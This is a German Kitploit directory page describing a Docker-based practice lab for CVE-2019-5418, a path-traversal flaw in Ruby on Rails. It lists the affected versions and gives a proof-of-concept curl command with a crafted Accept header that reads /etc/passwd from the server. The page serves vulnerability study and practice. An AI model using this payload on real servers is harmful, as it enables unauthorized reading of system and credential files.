Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-5418 — # Docker-basierte Laborumgebung für den CVE-2019-5418 Ruby on Rails Path-Traversal-Exploit, mit PoC-curl-Befehlen zum Lesen beliebiger Serverdateien über manipulierte Accept-Header. | Kitploit
Tools/GitHubGitHub/daehyeok0618/cve-2019-5418
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubdaehyeok0618/cve-2019-5418

CVE-2019-5418

# Docker-basierte Laborumgebung für den CVE-2019-5418 Ruby on Rails Path-Traversal-Exploit, mit PoC-curl-Befehlen zum Lesen beliebiger Serverdateien über manipulierte Accept-Header.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-5418: Ruby on Rails Path Traversal & beliebiges Dateilesen

Dieses Projekt ist eine Umgebung zum Üben und Reproduzieren der Local File Inclusion-Schwachstelle (CVE-2019-5418) in Ruby on Rails. Die Schwachstelle ermöglicht es, durch Path Traversal über den Accept-Header beliebige Dateien im Server zu lesen.

Zusammenfassung der Schwachstelle

Ruby on Rails ist ein Webanwendungs-Framework, mit dem Entwickler schnell und einfach Webanwendungen erstellen können.

Ruby on Rails Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 und v3 weist eine Local File Inclusion-Schwachstelle auf.

Wenn render file in einem Controller verwendet wird, um eine View außerhalb der Anwendung zu rendern, bestimmt Rails den Dateispeicherort anhand des vom Benutzer bereitgestellten Accept-Headers. Wird ein Accept-Header mit dem Wert Accept: ../../../../../../../../etc/passwd{{ gesendet, kann ein Angreifer die Path-Traversal-Schwachstelle ausnutzen, um beliebige Dateien zu lesen.

Einrichtung der Umgebung

Führen Sie die folgenden Befehle aus, um Ruby on Rails 5.2.2 zu kompilieren und zu starten:

root@kitploit:~
docker compose build
docker compose up -d

Nach dem Start des Servers können Sie die Ruby on Rails-Seite unter http://your-ip:3000 aufrufen.

image1

PoC-Beispiel

root@kitploit:~
curl -H "Accept: ../../../../../../etc/passwd{{" http://localhost:3000/robots

image2

Über den Accept-Header wurde erfolgreich eine beliebige Datei im Server gelesen.

Tool herunterladen